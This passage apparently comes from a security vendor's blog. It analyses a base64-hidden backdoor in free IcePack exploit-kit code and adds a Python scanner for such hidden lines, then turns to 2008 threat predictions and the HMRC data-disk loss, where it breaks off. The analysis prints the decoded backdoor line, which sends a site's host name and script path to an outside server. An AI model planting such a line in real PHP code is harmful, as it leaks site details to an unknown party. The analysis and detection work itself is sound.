This eventually leads to an iframe tag being added to the visitor's page, redirecting them to the Russian Mpack server. We have also observed what appears to have been a backdoor within the free IcePack code. This backdoor is encoded in base64, so it stands out a little more in the code and is thus easier to spot; however, it is appended at the end of a long line of unrelated code, so unless you scroll all the way to the right it might be missed. Again, displayed here is the result of decoding the original line of code:
file_get_contents('http://[removed].in/c.php?host=' . $_SERVER['HTTP_HOST'] . '&root=' . $_SERVER['SCRIPT_FILENAME']);
This server is not returning anything interesting at the moment, so it is hard to tell what exactly its function is. Perhaps it was used to track the number of installations? However, from where it is placed and from the way it is encoded, we have no doubt that this code is up to no good.
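A reviewer auditing PHP files for this kind of hidden line can decode every long base64 run and flag the ones that turn into network or environment calls, reporting the column so a blob far to the right is not missed. The following is an added example, not code from IcePack or from the original post; the function name, the indicator list and the eval(base64_decode()) wrapper in the constructed sample are assumptions.

```python
import base64
import binascii
import re

# Base64 runs of 40+ characters; shorter runs are usually ordinary identifiers.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Decoded content that merits review: outbound fetches, host details, eval.
SUSPICIOUS = re.compile(r"file_get_contents|https?://|\$_SERVER|eval\s*\(|curl_")


def scan_php_source(text, long_line=200):
    """Return one finding per base64 run that decodes to suspicious PHP."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in B64_RUN.finditer(line):
            blob = m.group(0)
            blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not base64-encoded text
            hits = sorted(set(SUSPICIOUS.findall(decoded)))
            if hits:
                findings.append({
                    "line": lineno,
                    "column": m.start() + 1,
                    # True when the blob starts beyond a typical editor width
                    "off_screen": m.start() >= long_line,
                    "indicators": hits,
                    "decoded": decoded,
                })
    return findings


# Constructed sample: the decoded line quoted in the article, re-encoded and
# appended to a long line of filler. The eval(base64_decode()) wrapper is assumed.
SAMPLE_DECODED = ("file_get_contents('http://[removed].in/c.php?host=' . "
                  "$_SERVER['HTTP_HOST'] . '&root=' . $_SERVER['SCRIPT_FILENAME']);")
SAMPLE_SOURCE = (
    "<?php\n"
    + "$counter = $counter + 1; " * 12
    + "eval(base64_decode('" + base64.b64encode(SAMPLE_DECODED.encode()).decode() + "'));\n"
    + "echo 'done';\n"
)

if __name__ == "__main__":
    for f in scan_php_source(SAMPLE_SOURCE):
        print(f"line {f['line']} col {f['column']}: {f['indicators']} -> {f['decoded']}")
```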
Another interesting line of code taken from the free IcePack code is a list of servers where the distributors would prefer you not to add iframes. IcePack contains an FTP checker script that can log into legitimate FTP servers in order to add a redirect to an exploit server (normally achieved by adding an iframe tag). Before logging in to an FTP server, the IcePack code first checks whether the Web site is on the banned list, shown below, and if it is, it blocks the login attempt:
$bad_hosts = array ( 'boom.ru', 'narod.ru', 'jino-net.ru', 'fatal.ru', 'h10.ru', 'h11.ru', 'h12.ru', 'h13.ru', 'h14.ru', 'h15.ru', 'h16.ru', '110mb.com', 'by.ru', 'tripod.com');
This $bad_hosts list shows sites where the people who released this free IcePack code would prefer you not to put iframes. Perhaps these are sites they use or control, but it’s not surprising that most of these sites are Russian (both Mpack and IcePack are coded by Russian groups).
Since we have not purchased the real versions of these packs, we cannot say for certain that any or all of the code mentioned here is not included in the real versions of these packs. It just goes to show that the same caution is needed in the underground as in the real world: caveat emptor. As for the free versions of these packs, if something looks too good to be true, it probably is.
All of the exploits contained in these free exploit packs are detected by Symantec products with the latest definitions.
Last week, we talked about the year in review. And now, everyone wants to know what will happen next. Well, I don't claim to be a clairvoyant, but it’s safe to say that the following areas will be interesting to watch in the coming year:
o Election Campaigns – As political candidates increasingly turn to the Internet, it is important to understand the associated IT security risks of increased dependence and interdependence on technology in the election process. These risks include, among others, the diversion of online campaign donations; dissemination of misinformation; fraud; phishing; and the invasion of privacy.
o Bot Evolution – We expect bots to diversify and evolve in their behavior. For example, we may see things like phishing sites hosted by bot zombies.
o Advanced Web Threats – As the number of available Web services increases and as browsers continue to converge on a uniform interpretation standard for scripting languages, such as JavaScript, Symantec expects the number of new Web-based threats to continue to increase.
o Mobile Platforms – Interest in mobile security has never been higher. As phones become more complex, more interesting and more connected, we expect attackers to take advantage.
o Spam Evolution – Symantec expects to see spam continuously evolve in order to evade traditional blocking systems and trick users into reading messages.
o Virtual Worlds – Symantec expects that as the use of persistent virtual worlds (PVWs) and massively multiplayer online games (MMOGs) expands, new threats will emerge as criminals, phishers, spammers, and others turn their attention to these new communities.
While the scale of the data loss by the UK’s Revenue and Customs is indeed stunning, there is still no indication that the missing disks containing information from 25 million UK residents have actually fallen into unfriendly hands. However, this is now almost irrelevant as we in the security industry sit and wait for the first scam or phishing attack that plays on people’s doubts and fears.
For those unaware of this issue, on November 20th Her Majesty’s Revenue & Customs (HMRC - the UK's tax and excise agency) acknowledged that it had lost two computer disks containing large amounts of confidential information, including names, addresses, dates of birth, and in some cases bank account information. The missing disks — apparently lost while being transported — may include information on as many as 25 million individuals, including recipients of child benefits.
HMRC believe the disks are still within one of their sites, but after an exhaustive search, they have failed to materialize. So, imagine if you or your family receive an email purporting to be from the Child Benefit Helpline, asking you to visit a certain Web site to input your name, address, national insurance number, and even bank account details so that they can be checked against records to see if your details have been compromised. Or, just think if you receive an email askin